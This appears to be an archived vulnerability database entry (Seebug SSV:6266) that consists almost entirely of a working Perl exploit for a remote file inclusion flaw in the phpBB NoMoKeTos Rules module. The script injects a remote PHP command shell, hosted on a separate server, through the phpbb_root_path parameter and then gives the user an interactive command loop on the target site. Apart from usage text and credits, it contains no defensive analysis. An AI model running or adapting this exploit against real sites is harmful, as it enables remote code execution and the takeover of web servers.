phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit

2007-03-01T00:00:00
ID SSV:6266
Type seebug
Reporter Root
Modified 2007-03-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl
#
#phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit
# 
#Coded by bd0rk || SOH-Crew
#
#Usage: exploit.pl [target] [cmd shell] [shell variable]
#
#Greetings: str0ke, TheJT, Kacper, Lu7k, Maik
#
#Vulnerable Code: include_once($phpbb_root_path . \'includes/functions_admin.\'.$phpEx);
#
# vendor: http://www.nomoketo.de/MODs/nomoketos_rules.zip

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];

if($Path!~/http:/// || $Pathtocmd!~/http:/// || !$cmdv){usage()}

head();

while()
{
       print \"[shell] $\";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$Path.\'includes/functions_nomoketos_rules.php?phpbb_root_path=\'.$Pathtocmd.\'?&\'.$cmdv.\'=\'.$cmd)or die \"
Could Not connect
\";

$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[
]/[....]/;

if (!$cmd) {print \"
Please Enter a Command

\"; $return =\"\";}

elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
       {print \"
Could Not Connect to cmd Host or Invalid Command Variable
\";exit}
elsif ($return =~/^<br./>.<b>Fatal.error/) {print \"
Invalid Command or No Return

\"}

if($return =~ /(.*)/)


{
       $finreturn = $1;
       $finreturn=~ tr/[....]/[
]/;
       print \"
$finreturn

\";
       last;
}

else {print \"[shell] $\";}}}last;

sub head()
 {
 print \"
============================================================================
\";
 print \" *phpBB Module NoMoKeTos Rules 0.0.1 Remote File Include Exploit*
\";
 print \"============================================================================
\";
 }
sub usage()
 {
 head();
 print \" Usage: exploit.pl [target] [cmd shell location] [cmd shell variable]

\";
 print \" <Site> - Full path to RulesMod ex: http://www.site.com/ 
\";
 print \" <cmd shell> - Path to cmd Shell e.g http://www.different-site.com/cmd.txt 
\";
 print \" <cmd variable> - Command variable used in php shell 
\";
 print \"============================================================================
\";
 print \"                           Bug Found by bd0rk 
\";
 print \"                           www.soh-crew.it.tt 
\";
 print \"============================================================================
\";
 exit();
 }